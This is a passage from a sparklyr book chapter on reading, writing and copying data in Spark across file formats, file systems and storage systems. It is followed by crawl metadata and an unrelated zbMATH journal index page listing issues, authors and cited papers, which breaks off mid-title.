table visible to the user. Next, we will present a technique that allows Spark to read files faster as well as to reduce read failures by describing the structure of a dataset in advance. ### 8.2.2 Schema When reading data, Spark is able to determine the data source’s column names and column types, also known as the schema. However, guessing the schema comes at a cost; Spark needs to do an initial pass on the data to guess what it is. For a large dataset, this can add a significant amount of time to the data ingestion process, which can become costly even for medium-size datasets. For files that are read over and over again, the additional read time accumulates over time. To avoid this, Spark allows you to provide a column definition by providing a columns argument to describe your dataset. You can create this schema by sampling a small portion of the original file yourself: spec_with_r <- sapply(read.csv("data-csv/letters1.csv", nrows = 10), class) spec_with_r x y "factor" "integer" Or, you can set the column specification to a vector containing the column types explicitly. The vector’s values are named to match the field names: spec_explicit <- c(x = "character", y = "numeric") spec_explicit x y "character" "numeric" The accepted variable types are: integer, character, logical, double, numeric, factor, Date, and POSIXct. Then, when reading using spark_read_csv(), you can pass spec_with_r to the columns argument to match the names and types of the original file. This helps to improve performance since Spark will not need to determine the column types. spark_read_csv(sc, "data-csv/", columns = spec_with_r) # Source: spark<datacsv> [?? x 2] x y <chr> <int> 1 a 1 2 b 2 3 c 3 4 a 1 5 b 2 6 c 3 The following example shows how to set the field type to something different. However, the new field type needs to be a compatible type in the original dataset. For example, you cannot set a character field to numeric. If you use an incompatible type, the file read will fail with an error. Additionally, the following example also changes the names of the original fields: spec_compatible <- c(my_letter = "character", my_number = "character") spark_read_csv(sc, "data-csv/", columns = spec_compatible) # Source: spark<datacsv> [?? x 2] my_letter my_number <chr> <chr> 1 a 1 2 b 2 3 c 3 4 a 1 5 b 2 6 c 3 In Spark, malformed entries can cause errors during reading, particularly for non-character fields. To prevent such errors, we can use a file specification that imports them as characters and then use dplyr to coerce the field into the desired type. This subsection reviewed how we can read files faster and with fewer failures, which lets us start our analysis more quickly. Another way to accelerate our analysis is by loading less data into Spark memory, which we examine in the next section. ### 8.2.3 Memory By default, when using Spark with R, when you read data, it is copied into Spark’s distributed memory, making data analysis and other operations very fast. There are cases, such as when the data is too big, for which loading all the data might not be practical or even necessary. For those cases, Spark can just “map” the files without copying data into memory. The mapping creates a sort of virtual table in Spark. The implication is that when a query runs against that table, Spark needs to read the data from the files at that time. Any consecutive reads after that will do the same. In effect, Spark becomes a pass-through for the data. The advantage of this method is that there is almost no up-front time cost to “reading” the file; the mapping is very fast. The downside is that running queries that actually extract data will take longer. This is controlled by the memory argument of the read functions. Setting it to FALSE prevents the data copy (the default is TRUE): mapped_csv <- spark_read_csv(sc, "data-csv/", memory = FALSE) There are good use cases for this method, one of which is when not all columns of a table are needed. For example, take a very large file that contains many columns. Assuming this is not the first time you interact with this data, you would know what columns are needed for the analysis. When you know which columns you need, the files can be read using memory = FALSE, and then the needed columns can be selected with dplyr. The resulting dplyr variable can then be cached into memory, using the compute() function. This will make Spark query the file(s), pull the selected fields, and copy only that data into memory. The result is an in-memory table that took comparatively less time to ingest: mapped_csv %>% dplyr::select(y) %>% dplyr::compute("test") The next section covers a short technique to make it easier to carry the original field names of imported data. ### 8.2.4 Columns Spark 1.6 required that column names be sanitized, so R does that by default. There might be cases when you would like to keep the original names intact, or when working with Spark version 2.0 or above. To do that, set the sparklyr.sanitize.column.names option to FALSE: options(sparklyr.sanitize.column.names = FALSE) copy_to(sc, iris, overwrite = TRUE) # Source: table<iris> [?? x 5] # Database: spark_connection Sepal.Length Sepal.Width Petal.Length Petal.Width Species <dbl> <dbl> <dbl> <dbl> <chr> 1 5.1 3.5 1.4 0.2 setosa 2 4.9 3 1.4 0.2 setosa 3 4.7 3.2 1.3 0.2 setosa 4 4.6 3.1 1.5 0.2 setosa 5 5 3.6 1.4 0.2 setosa 6 5.4 3.9 1.7 0.4 setosa 7 4.6 3.4 1.4 0.3 setosa 8 5 3.4 1.5 0.2 setosa 9 4.4 2.9 1.4 0.2 setosa 10 4.9 3.1 1.5 0.1 setosa # ... with more rows With this review of how to read data into Spark, we move on to look at how we can write data from our Spark session. ## 8.3 Writing Data Some projects require that new data generated in Spark be written back to a remote source. For example, the data could be new predicted values returned by a Spark model. The job processes the mass generation of predictions, but then the predictions need to be stored. This section focuses on how you should use Spark for moving the data from Spark into an external destination. Many new users start by downloading Spark data into R, and then upload it to a target, as illustrated in Figure 8.2. It works for smaller datasets, but it becomes inefficient for larger ones. The data typically grows in size to the point that it is no longer feasible for R to be the middle point. All efforts should be made to have Spark connect to the target location. This way, reading, processing, and writing happens within the same Spark session. As Figure 8.3 shows, a better approach is to use Spark to read, process, and write to the target. This approach is able to scale as big as the Spark cluster allows, and prevents R from becoming a choke point. Consider the following scenario: a Spark job just processed predictions for a large dataset, resulting in a considerable amount of predictions. Choosing a method to write results will depend on the technology infrastructure you are working on. More specifically, it will depend on Spark and the target running, or not, in the same cluster. Back to our scenario, we have a large dataset in Spark that needs to be saved. When Spark and the target are in the same cluster, copying the results is not a problem; the data transfer is between RAM and disk of the same cluster or efficiently shuffled through a high-bandwidth connection. But what to do if the target is not within the Spark cluster? There are two options, and choosing one will depend on the size of the data and network speed: Spark transfer In this case, Spark connects to the remote target location and copies the new data. If this is done within the same datacenter, or cloud provider, the data transfer could be fast enough to have Spark write the data directly. External transfer and otherwise Spark can write the results to disk and transfers them via a third-party application. Spark writes the results as files and then a separate job copies the files over. In the target location, you would use a separate process to transfer the data into the target location. It is best to recognize that Spark, R, and any other technology are tools. No tool can do everything, nor should be expected to. Next we will describe how to copy data into Spark or collect large datasets that don’t fit in-memory, this can be used to transfer data across clusters, or help initialize your distributed datasets. ## 8.4 Copy Previous chapters used copy_to() as a handy helper to copy data into Spark; however, you can use copy_to() only to transfer in-memory datasets that are already loaded in memory. These datasets tend to be much smaller than the kind of datasets you would want to copy into Spark. For instance, suppose that we have a 3 GB dataset generated as follows: dir.create("largefile.txt") write.table(matrix(rnorm(10 * 10^6), ncol = 10), "largefile.txt/1", append = T, col.names = F, row.names = F) for (i in 2:30) file.copy("largefile.txt/1", paste("largefile.txt/", i)) If we had only 2 GB of memory in the driver node, we would not be able to load this 3 GB file into memory using copy_to(). Instead, when using the HDFS as storage in your cluster, you can use the hadoop command-line tool to copy files from disk into Spark from the terminal as follows. Notice that the following code works only in clusters using HDFS, not in local environments. hadoop fs -copyFromLocal largefile.txt largefile.txt You then can read the uploaded file, as described in the File Formats section; for text files, you would run: spark_read_text(sc, "largefile.txt", memory = FALSE) # Source: spark<largefile> [?? x 1] line <chr> 1 0.0982531064914565 -0.577567317599452 -1.66433938237253 -0.20095089489… 2 -1.08322304504007 1.05962389624635 1.1852771207729 -0.230934710049462 … 3 -0.398079835552421 0.293643382374479 0.727994248743204 -1.571547990532… 4 0.418899768227183 0.534037617828835 0.921680317620166 -1.6623094393911… 5 -0.204409401553028 -0.0376212693728992 -1.13012269711811 0.56149527218… 6 1.41192628218417 -0.580413572014808 0.727722566256326 0.5746066486689 … 7 -0.313975036262443 -0.0166426329807508 -0.188906975208319 -0.986203251… 8 -0.571574679637623 0.513472254005066 0.139050812059352 -0.822738334753… 9 1.39983023148955 -1.08723592838627 1.02517804413913 -0.412680186313667… 10 0.6318328148434 -1.08741784644221 -0.550575696474202 0.971967251067794… # … with more rows collect() has a similar limitation in that it can collect only datasets that fit your driver memory; however, if you had to extract a large dataset from Spark through the driver node, you could use specialized tools provided by the distributed storage. For HDFS, you would run the following: hadoop fs -copyToLocal largefile.txt largefile.txt Alternatively, you can also collect datasets that don’t fit in memory by providing a callback to collect(). A callback is just an R function that will be called over each Spark partition. You then can write this dataset to disk or push to other clusters over the network. You could use the following code to collect 3 GB even if the driver node collecting this dataset had less than 3 GB of memory. That said, as Chapter 3 explains, you should avoid collecting large datasets into a single machine since this creates a significant performance bottleneck. For conciseness, we will collect only the first million rows; feel free to remove head(10^6) if you have a few minutes to spare: dir.create("large") spark_read_text(sc, "largefile.txt", memory = FALSE) %>% collect(callback = function(df, idx) { writeLines(df$line, paste0("large/large-", idx, ".txt")) }) Make sure you clean up these large files and empty your recycle bin as well: unlink("largefile.txt", recursive = TRUE) unlink("large", recursive = TRUE) In most cases, data will already be stored in the cluster, so you should not need to worry about copying large datasets; instead, you can usually focus on reading and writing different file formats, which we describe next. ## 8.5 File Formats Out of the box, Spark is able to interact with several file formats, like CSV, JSON, LIBSVM, ORC, and Parquet. Table 8.1 maps the file format to the function you should use to read and write data in Spark. TABLE 8.1: Spark functions to read and write file formats Format Read Write Comma separated values (CSV) spark_read_csv() spark_write_csv() JavaScript Object Notation (JSON) spark_read_json() spark_write_json() Library for Support Vector Machines (LIBSVM) spark_read_libsvm() spark_write_libsvm() Optimized Row Columnar (ORC) spark_read_orc() spark_write_orc() Apache Parquet spark_read_parquet() spark_write_parquet() Text spark_read_text() spark_write_text() The following sections will describe special considerations particular to each file format as well as some of the strengths and weaknesses of some popular file formats, starting with the well-known CSV file format. ### 8.5.1 CSV The CSV format might be the most common file type in use today. It is defined by a text file separated by a given character, usually a comma. It should be pretty straightforward to read CSV files; however, it’s worth mentioning a couple techniques that can help you process CSVs that are not fully compliant with a well-formed CSV file. Spark offers the following modes for addressing parsing issues: Permissive Inserts NULL values for missing tokens Drop Malformed Drops lines that are malformed Fail Fast Aborts if it encounters any malformed line You can use these in sparklyr by passing them inside the options argument. The following example creates a file with a broken entry. It then shows how it can be read into Spark: ## Creates bad test file writeLines(c("bad", 1, 2, 3, "broken"), "bad.csv") spark_read_csv( sc, "bad3", "bad.csv", columns = list(foo = "integer"), options = list(mode = "DROPMALFORMED")) # Source: spark<bad3> [?? x 1] foo <int> 1 1 2 2 3 3 Spark provides an issue tracking column, which was hidden by default. To enable it, add _corrupt_record to the columns list. You can combine this with the use of the PERMISSIVE mode. All rows will be imported, invalid entries will receive an NA, and the issue will be tracked in the _corrupt_record column: spark_read_csv( sc, "bad2", "bad.csv", columns = list(foo = "integer", "_corrupt_record" = "character"), options = list(mode = "PERMISSIVE") ) # Source: spark<bad2> [?? x 2] foo _corrupt_record <int> <chr> 1 1 NA 2 2 NA 3 3 NA 4 NA broken Reading and storing data as CSVs is quite common and supported across most systems. For tabular datasets, it is still a popular option, but for datasets containing nested structures and nontabular data, JSON is usually preferred. ### 8.5.2 JSON JSON is a file format originally derived from JavaScript that has grown to be language-independent and very popular due to its flexibility and ubiquitous support. Reading and writing JSON files is quite straightforward: writeLines("{'a':1, 'b': {'f1': 2, 'f3': 3}}", "data.json") simple_json <- spark_read_json(sc, "data.json") simple_json # Source: spark<data> [?? x 2] a b <dbl> <list> 1 1 <list [2]> However, when you deal with a dataset containing nested fields like the one from this example, it is worth pointing out how to extract nested fields. One approach is to use a JSON path, which is a domain-specific syntax commonly used to extract and query JSON files. You can use a combination of get_json_object() and to_json() to specify the JSON path you are interested in. To extract f1 you would run the following transformation: simple_json %>% dplyr::transmute(z = get_json_object(to_json(b), '$.f1')) # Source: spark<?> [?? x 3] a b z <dbl> <list> <chr> 1 1 <list [2]> 2 Another approach is to install sparkly.nested from CRAN with install.packages("sparklyr.nested") and then unnest nested data with sdf_unnest(): sparklyr.nested::sdf_unnest(simple_json, "b") # Source: spark<?> [?? x 3] a f1 f3 <dbl> <dbl> <dbl> 1 1 2 3 While JSON and CSVs are quite simple to use and versatile, they are not optimized for performance; however, other formats like ORC, AVRO, and Parquet are. ### 8.5.3 Parquet Apache Parquet, Apache ORC, and Apache AVRO are all file formats designed with performance in mind. Parquet and ORC store data in columnar format, while AVRO is row-based. All of them are binary file formats, which reduces storage space and improves performance. This comes at the cost of making them a bit more difficult to read by external systems and libraries; however, this is usually not an issue when used as intermediate data storage within Spark. To illustrate this, Figure 8.4 plots the result of running a 1-million-row write-speed benchmark using the bench package; feel free to use your own benchmarks over meaningful datasets when deciding which format best fits your needs: numeric <- copy_to(sc, data.frame(nums = runif(10^6))) bench::mark( CSV = spark_write_csv(numeric, "data.csv", mode = "overwrite"), JSON = spark_write_json(numeric, "data.json", mode = "overwrite"), Parquet = spark_write_parquet(numeric, "data.parquet", mode = "overwrite"), ORC = spark_write_parquet(numeric, "data.orc", mode = "overwrite"), iterations = 20 ) %>% ggplot2::autoplot() From now on, be sure to disconnect from Spark whenever we present a new spark_connect() command: spark_disconnect(sc) This concludes the introduction to some of the out-of-the-box supported file formats, we will present next how to deal with formats that require external packages and customization. ### 8.5.4 Others Spark is a very flexible computing platform. It can add functionality by using extension programs, called packages. You can access a new source type or file system by using the appropriate package. Packages need to be loaded into Spark at connection time. To load the package, Spark needs its location, which could be inside the cluster, in a file share, or the internet. In sparklyr, the package location is passed to spark_connect(). All packages should be listed in the sparklyr.connect.packages entry of the connection configuration. It is possible to access data source types that we didn’t previously list. Loading the appropriate default package for Spark is the first of two steps The second step is to actually read or write the data. The spark_read_source() and spark_write_source() functions do that. They are generic functions that can use the libraries imported by a default package. For instance, we can read XML files as follows: sc <- spark_connect(master = "local", version = "2.3", config = list( sparklyr.connect.packages = "com.databricks:spark-xml_2.11:0.5.0")) writeLines("<ROWS><ROW><text>Hello World</text></ROW>", "simple.xml") spark_read_source(sc, "simple_xml", "simple.xml", "xml") # Source: spark<data> [?? x 1] text <chr> 1 Hello World which you can also write back to XML with ease, as follows: tbl(sc, "simple_xml") %>% spark_write_source("xml", options = list(path = "data.xml")) In addition, there are a few extensions developed by the R community to load additional file formats, such as sparklyr.nested to assist with nested data, spark.sas7bdat to read data from SAS, sparkavro to read data in AVRO format, and sparkwarc to read WARC files, which use extensibility mechanisms introduced in Chapter 10. Chapter 11 presents techniques to use R packages to load additional file formats, and Chapter 13 presents techniques to use Java libraries to complement this further. But first, let’s explore how to retrieve and store files from several different file systems. ## 8.6 File Systems Spark defaults to the file system on which it is currently running. In a YARN managed cluster, the default file system will be HDFS. An example path of /home/user/file.csv will be read from the cluster’s HDFS folders, not the Linux folders. The operating system’s file system will be accessed for other deployments, such as Standalone, and sparklyr’s local. The file system protocol can be changed when reading or writing. You do this via the path argument of the sparklyr function. For example, a full path of _file://home/user/file.csv_ forces the use of the local operating system’s file system. There are many other file system protocols, such as _dbfs://_ for Databricks’ file system, _s3a://_ for Amazon’s S3 service, _wasb://_ for Microsoft Azure storage, and _gs://_ for Google storage. Spark does not provide support for all them directly; instead, they are configured as needed. For instance, accessing the “s3a” protocol requires adding a package to the sparklyr.connect.packages configuration setting, while connecting and specifying appropriate credentials might require using the AWS_ACCESS_KEY_ID and AWS_SECRET_ACCESS_KEY environment variables. Sys.setenv(AWS_ACCESS_KEY_ID = my_key_id) Sys.setenv(AWS_SECRET_ACCESS_KEY = my_secret_key) sc <- spark_connect(master = "local", version = "2.3", config = list( my_file <- spark_read_csv(sc, "my-file", path = "s3a://my-bucket/my-file.csv") Accessing other file protocols requires loading different packages, although, in some cases, the vendor providing the Spark environment might load the package for you. Please refer to your vendor’s documentation to find out whether that is the case. ## 8.7 Storage Systems A data lake and Spark usually go hand-in-hand, with optional access to storage systems like databases and data warehouses. Presenting all the different storage systems with appropriate examples would be quite time-consuming, so instead we present some of the commonly used storage systems. As a start, Apache Hive is a data warehouse software that facilitates reading, writing, and managing large datasets residing in distributed storage using SQL. In fact, Spark has components from Hive built directly into its sources. It is very common to have installations of Spark or Hive side-by-side, so we will start by presenting Hive, followed by Cassandra, and then close by looking at JDBC connections. ### 8.7.1 Hive In YARN managed clusters, Spark provides a deeper integration with Apache Hive. Hive tables are easily accessible after opening a Spark connection. You can access a Hive table’s data using DBI by referencing the table in a SQL statement: sc <- spark_connect(master = "local", version = "2.3") spark_read_csv(sc, "test", "data-csv/", memory = FALSE) DBI::dbGetQuery(sc, "SELECT * FROM test limit 10") Another way to reference a table is with dplyr using the tbl() function, which retrieves a reference to the table: dplyr::tbl(sc, "test") It is important to reiterate that no data is imported into R; the tbl() function only creates a reference. You then can pipe more dplyr verbs following the tbl() command: dplyr::tbl(sc, "test") %>% dplyr::group_by(y) %>% dplyr::summarise(totals = sum(y)) Hive table references assume a default database source. Often, the needed table is in a different database within the metastore. To access it using SQL, prefix the database name to the table. Separate them using a period, as demonstrated here: DBI::dbSendQuery(sc, "SELECT * FROM databasename.table") In dplyr, the in_schema() function can be used. The function is used inside the tbl() call: tbl(sc, dbplyr::in_schema("databasename", "table")) You can also use the tbl_change_db() function to set the current session’s default database. Any subsequent call via DBI or dplyr will use the selected name as the default database: tbl_change_db(sc, "databasename") The following examples require additional Spark packages and databases which might be difficult to follow unless you happen to have a JDBC driver or Cassandra database accessible to you. spark_disconnect(sc) Next, we explore a less structured storage system, often referred to as a NoSQL database. ### 8.7.2 Cassandra Apache Cassandra is a free and open source, distributed, wide-column store, NoSQL database management system designed to handle large amounts of data across many commodity servers. While there are many other database systems beyond Cassandra, taking a quick look at how Cassandra can be used from Spark will give you insight into how to make use of other database and storage systems like Solr, Redshift, Delta Lake, and others. The following example code shows how to use the datastax:spark-cassandra-connector package to read from Cassandra. The key is to use the org.apache.spark.sql.cassandra library as the source argument. It provides the mapping Spark can use to make sense of the data source. Unless you have a Cassandra database, skip executing the following statement: sc <- spark_connect(master = "local", version = "2.3", config = list( sparklyr.connect.packages = "datastax:spark-cassandra-connector:2.3.1-s_2.11")) sc, name = "emp", source = "org.apache.spark.sql.cassandra", options = list(keyspace = "dev", table = "emp"), memory = FALSE) One of the most useful features of Spark when dealing with external databases and data warehouses is that Spark can push down computation to the database, a feature known as pushdown predicates. In a nutshell, pushdown predicates improve performance by asking remote databases smart questions. When you execute a query that contains the filter(age > 20) expression against a remote table referenced through spark_read_source() and not loaded in memory, rather than bringing the entire table into Spark, it will be passed to the remote database and only a subset of the remote table is retrieved. While it is ideal to find Spark packages that support the remote storage system, there will be times when a package is not available and you need to consider vendor JDBC drivers. ### 8.7.3 JDBC When a Spark package is not available to provide connectivity, you can consider a JDBC connection. JDBC is an interface for the programming language Java, which defines how a client can access a database. It is quite easy to connect to a remote database with spark_read_jdbc(), and spark_write_jdbc(); as long as you have access to the appropriate JDBC driver, which at times is trivial and other times is quite an adventure. To keep this simple, we can briefly consider how a connection to a remote MySQL database could be accomplished. First, you would need to download the appropriate JDBC driver from MySQL’s developer portal and specify this additional driver as a sparklyr.shell.driver-class-path connection option. Since JDBC drivers are Java-based, the code is contained within a JAR (Java ARchive) file. As soon as you’re connected to Spark with the appropriate driver, you can use the jdbc:// protocol to access particular drivers and databases. Unless you are willing to download and configure MySQL on your own, skip executing the following statement: sc <- spark_connect(master = "local", version = "2.3", config = list( "sparklyr.shell.driver-class-path" = )) url = "jdbc:mysql://localhost:3306/sparklyr", dbtable = "person")) If you are a customer of particular database vendors, making use of the vendor-provided resources is usually the best place to start looking for appropriate drivers. ## 8.8 Recap This chapter expanded on how and why you should use Spark to connect and process a variety of data sources through a new data storage model known as data lakes—a storage pattern that provides more flexibility than standard ETL processes by enabling you to use raw datasets with, potentially, more information to enrich data analysis and modeling. We also presented best practices for reading, writing, and copying data into and from Spark. We then returned to exploring the components of a data lake: file formats and file systems, with the former representing how data is stored, and the latter where the data is stored. You then learned how to tackle file formats and storage systems that require additional Spark packages, reviewed some of the performance trade-offs across file formats, and learned the concepts required to make use of storage systems (databases and warehouses) in Spark. While reading and writing datasets should come naturally to you, you might still hit resource restrictions while reading and writing large datasets. To handle these situations, Chapter 9 shows you how Spark manages tasks and data across multiple machines, which in turn allows you to further improve the performance of your analysis and modeling tasks. 1. Codd EF (1970). “A relational model of data for large shared data banks.”
2023-02-09 08:11:59
{"extraction_info": {"found_math": true, "script_math_tex": 0, "script_math_asciimath": 0, "math_annotations": 0, "math_alttext": 0, "mathml": 0, "mathjax_tag": 0, "mathjax_inline_tex": 1, "mathjax_display_tex": 0, "mathjax_asciimath": 1, "img_math": 0, "codecogs_latex": 0, "wp_latex": 0, "mimetex.cgi": 0, "/images/math/codecogs": 0, "mathtex.cgi": 0, "katex": 0, "math-container": 0, "wp-katex-eq": 0, "align": 0, "equation": 0, "x-ck12": 0, "texerror": 0, "math_score": 0.23805581033229828, "perplexity": 2111.5622005515697}, "config": {"markdown_headings": true, "markdown_code": true, "boilerplate_config": {"ratio_threshold": 0.18, "absolute_threshold": 10, "end_threshold": 15, "enable": true}, "remove_buttons": true, "remove_image_figures": true, "remove_link_clusters": true, "table_config": {"min_rows": 2, "min_cols": 3, "format": "plain"}, "remove_chinese": true, "remove_edit_buttons": true, "extract_latex": true}, "warc_path": "s3://commoncrawl/crawl-data/CC-MAIN-2023-06/segments/1674764501555.34/warc/CC-MAIN-20230209081052-20230209111052-00186.warc.gz"}
https://zbmath.org/serials/?q=se%3A2957
# zbMATH — the first resource for mathematics ## Journal of Numerical Mathematics Short Title: J. Numer. Math. Publisher: De Gruyter, Berlin ISSN: 1570-2820; 1569-3953/e Online: http://www.degruyter.com/view/j/jnma Predecessor: East-West Journal of Numerical Mathematics Comments: Indexed cover-to-cover Documents Indexed: 298 Publications (since 2002) References Indexed: 189 Publications with 4,208 References. all top 5 #### Latest Issues 29, No. 2 (2021) 29, No. 1 (2021) 28, No. 4 (2020) 28, No. 3 (2020) 28, No. 2 (2020) 28, No. 1 (2020) 27, No. 4 (2019) 27, No. 3 (2019) 27, No. 2 (2019) 27, No. 1 (2019) 26, No. 4 (2018) 26, No. 3 (2018) 26, No. 2 (2018) 26, No. 1 (2018) 25, No. 4 (2017) 25, No. 3 (2017) 25, No. 2 (2017) 25, No. 1 (2017) 24, No. 4 (2016) 24, No. 3 (2016) 24, No. 2 (2016) 24, No. 1 (2016) 23, No. 4 (2015) 23, No. 3 (2015) 23, No. 2 (2015) 23, No. 1 (2015) 22, No. 4 (2014) 22, No. 3 (2014) 22, No. 2 (2014) 22, No. 1 (2014) 21, No. 4 (2013) 21, No. 3 (2013) 21, No. 2 (2013) 21, No. 1 (2013) 20, No. 3-4 (2012) 20, No. 2 (2012) 20, No. 1 (2012) 19, No. 4 (2011) 19, No. 3 (2011) 19, No. 2 (2011) 19, No. 1 (2011) 18, No. 4 (2010) 18, No. 3 (2010) 18, No. 2 (2010) 18, No. 1 (2010) 17, No. 4 (2009) 17, No. 3 (2009) 17, No. 2 (2009) 17, No. 1 (2009) 16, No. 4 (2008) 16, No. 3 (2008) 16, No. 2 (2008) 16, No. 1 (2008) 15, No. 4 (2007) 15, No. 3 (2007) 15, No. 2 (2007) 15, No. 1 (2007) 14, No. 4 (2006) 14, No. 3 (2006) 14, No. 2 (2006) 14, No. 1 (2006) 13, No. 4 (2005) 13, No. 3 (2005) 13, No. 2 (2005) 13, No. 1 (2005) 12, No. 4 (2004) 12, No. 3 (2004) 12, No. 2 (2004) 12, No. 1 (2004) 11, No. 4 (2003) 11, No. 3 (2003) 11, No. 2 (2003) 11, No. 1 (2003) 10, No. 4 (2002) 10, No. 3 (2002) 10, No. 2 (2002) 10, No. 1 (2002) all top 5 #### Authors 13 Hoppe, Ronald H. W. 7 Kuznetsov, Yurii Alekseevich 6 Bangerth, Wolfgang 6 Glowinski, Roland 6 Kanschat, Guido 6 Maier, Matthias Sebastian 6 Rannacher, Rolf 6 Repin, Sergeĭ Igorevich 6 Rivière, Beatrice M. 6 Turcksin, Bruno 5 Heister, Timo 5 Heltai, Luca 5 Kronbichler, Martin 5 Nicaise, Serge 4 Arndt, Daniel 4 Axelsson, Axel Owe Holger 4 Carstensen, Carsten 4 Davydov, Denis 4 Kadalbajoo, Mohan K. 4 Pelteret, Jean-Paul 4 Schieweck, Friedhelm 4 Suttmeier, Franz-Theo 4 Turek, Stefan 3 Agouzal, Abdellatif 3 Chen, Hongsen 3 Feistauer, Miloslav 3 Girault, Vivette 3 Hackbusch, Wolfgang 3 Langer, Ulrich 3 Pasciak, Joseph E. 3 Rebholz, Leo G. 3 Seaïd, Mohammed 3 Steinbach, Olaf 2 Bacuta, Constantin 2 Banda, Mapundi Kondwani 2 Benner, Peter 2 Boglaev, Igor P. 2 Bonito, Andrea 2 Borzì, Alfio 2 Bramble, James H. 2 Caboussat, Alexandre 2 Chen, Zhangxin 2 Clevenger, Thomas C. 2 Demyanko, Kirill V. 2 Dryja, Maksymilian 2 Eymard, Robert 2 Fehling, Marc 2 Foss, F. J. II. 2 Gatica, Gabriel N. 2 Gerardo-Giorda, Luca 2 Hecht, Frédéric 2 Herbin, Raphaèle 2 Hinze, Michael 2 Hiptmair, Ralf 2 Hussain, Malik Zawwar 2 Ikhile, Monday Ndidi Oziegbe 2 Kamont, Zdzisław 2 Kučera, Václav 2 Kumar, Devendra 2 Li, Cuixia 2 Lipnikov, Konstantin N. 2 Lukáčová-Medvid’ová, Mária 2 Meszmer, Peter 2 Moore, Peter K. 2 Nataf, Frédéric 2 Nechepurenko, Yuri M. 2 Neilan, Michael 2 Neittaanmäki, Pekka J. 2 Novati, Paolo 2 Okuonghae, Robert I. 2 Ouazzi, Abderrahim 2 Owolabi, Kolade Matthew 2 Pani, Amiya Kumar 2 Rabus, Hella 2 Reusken, Arnold 2 Şahin, Niyazi 2 Schroder, Andreas 2 She, Bangwei 2 Sobotíková, Veronika 2 Šolín, Pavel 2 Soualem, Nadir 2 Sweilam, Nasser Hassan 2 Vassilevski, Yuri V. 2 Vihharev, Jevgeni 2 Xu, Jinchao 2 Yüzbaşı, Şuayip 2 Zhou, Zhaojie 2 Zikatanov, Ludmil T. 1 Aarnes, Jørg E. 1 Abdi, Ali 1 Achchab, A. 1 Alonso-Mallo, Isaías 1 Alzetta, Giovanni 1 Amani, Sanaz 1 An, Rong 1 Angelova, Ivanka Tr. 1 Annaby, Mahmoud H. 1 Antil, Harbir 1 Anton, François 1 Apel, Thomas ...and 380 more Authors all top 5 #### Fields 275 Numerical analysis (65-XX) 124 Partial differential equations (35-XX) 63 Fluid mechanics (76-XX) 26 Calculus of variations and optimal control; optimization (49-XX) 20 Ordinary differential equations (34-XX) 13 Mechanics of deformable solids (74-XX) 13 Operations research, mathematical programming (90-XX) 8 Integral equations (45-XX) 8 Optics, electromagnetic theory (78-XX) 6 Approximations and expansions (41-XX) 3 Functional analysis (46-XX) 3 Probability theory and stochastic processes (60-XX) 3 Classical thermodynamics, heat transfer (80-XX) 3 Biology and other natural sciences (92-XX) 3 Systems theory; control (93-XX) 2 Linear and multilinear algebra; matrix theory (15-XX) 2 Integral transforms, operational calculus (44-XX) 2 Operator theory (47-XX) 2 Computer science (68-XX) 2 Statistical mechanics, structure of matter (82-XX) 1 General and overarching topics; collections (00-XX) 1 Field theory and polynomials (12-XX) 1 Real functions (26-XX) 1 Dynamical systems and ergodic theory (37-XX) 1 Harmonic analysis on Euclidean spaces (42-XX) 1 Quantum theory (81-XX) 1 Game theory, economics, finance, and other social and behavioral sciences (91-XX) #### Citations contained in zbMATH Open 221 Publications have been cited 2,111 times in 1,950 Documents Cited by Year New development in freefem++. Zbl 1266.68090 Hecht, F. 2012 The deal.II library, version 8.4. Zbl 1348.65187 Bangerth, Wolfgang; Davydov, Denis; Heister, Timo; Heltai, Luca; Kanschat, Guido; Kronbichler, Martin; Maier, Matthias; Turcksin, Bruno; Wells, David 2016 The deal.II library, version 8.5. Zbl 1375.65148 Arndt, Daniel; Bangerth, Wolfgang; Davydov, Denis; Heister, Timo; Heltai, Luca; Kronbichler, Martin; Maier, Matthias; Pelteret, Jean-Paul; Turcksin, Bruno; Wells, David 2017 Hierarchical Kronecker tensor-product approximations. Zbl 1081.65035 Hackbusch, W.; Khoromskij, B. N.; Tyrtyshnikov, E. E. 2005 A staggered discontinuous Galerkin method for the convection-diffusion equation. Zbl 1300.65065 Chung, Eric; Lee, C. S. 2012 Analysis of time-dependent Navier-Stokes flow coupled with Darcy flow. Zbl 1159.76010 Çeşmelioğlu, A.; Rivière, B. 2008 The deal.II library, version 9.0. Zbl 1410.65363 Alzetta, Giovanni; Arndt, Daniel; Bangerth, Wolfgang; Boddu, Vishal; Brands, Benjamin; Davydov, Denis; Gassmöller, Rene; Heister, Timo; Heltai, Luca; Kormann, Katharina; Kronbichler, Martin; Maier, Matthias; Pelteret, Jean-Paul; Turcksin, Bruno; Wells, David 2018 Duality-based adaptivity in the $$hp$$-finite element method. Zbl 1050.65111 Heuveline, V.; Rannacher, R. 2003 The deal.II library, Version 9.1. Zbl 1435.65010 Arndt, Daniel; Bangerth, Wolfgang; Clevenger, Thomas C.; Davydov, Denis; Fehling, Marc; Garcia-Sanchez, Daniel; Harper, Graham; Heister, Timo; Heltai, Luca; Kronbichler, Martin; Kynch, Ross Maguire; Maier, Matthias; Pelteret, Jean-Paul; Turcksin, Bruno; Wells, David 2019 Goal-oriented error control of the iterative solution of finite element equations. Zbl 1169.65340 Meidner, D.; Rannacher, R.; Vihharev, J. 2009 Overlapping Schwarz methods in H(curl) on polyhedral domains. Zbl 1017.65099 Pasciak, J. E.; Zhao, J. 2002 Layer-adapted meshes for one-dimensional reaction-convection-diffusion problems. Zbl 1056.65076 Linß, T. 2004 A posteriori error control of a state constrained elliptic control problem. Zbl 1161.65049 Günther, A.; Hinze, M. 2008 Discontinuous Galerkin method of lines for solving nonstationary singularly perturbed linear problems. Zbl 1059.65083 2004 A posteriori error estimation of finite element approximations of pointwise state constrained distributed control problems. Zbl 1178.65070 Hoppe, R. H. W.; Kieweg, M. 2009 $$A$$-stable discontinuous Galerkin-Petrov time discretization of higher order. Zbl 1198.65093 Schieweck, F. 2010 Analysis of the Chang-Cooper discretization scheme for a class of Fokker-Planck equations. Zbl 1327.35371 2015 A second-order scheme for singularly perturbed differential equations with discontinuous source term. Zbl 1023.65077 Roos, H.-G.; Zarin, H. 2002 Numerical solution of the infinite-dimensional LQR problem and the associated Riccati differential equations. Zbl 1444.65032 Benner, Peter; Mena, Hermann 2018 The all-floating boundary element tearing and interconnecting method. Zbl 1423.74943 Of, G.; Steinbach, O. 2009 Adaptive finite element solution of eigenvalue problems: Balancing of discretization and iteration error. Zbl 1222.65123 Rannacher, R.; Westenberger, A.; Wollner, W. 2010 Elastoviscoplastic finite element analysis in 100 lines of 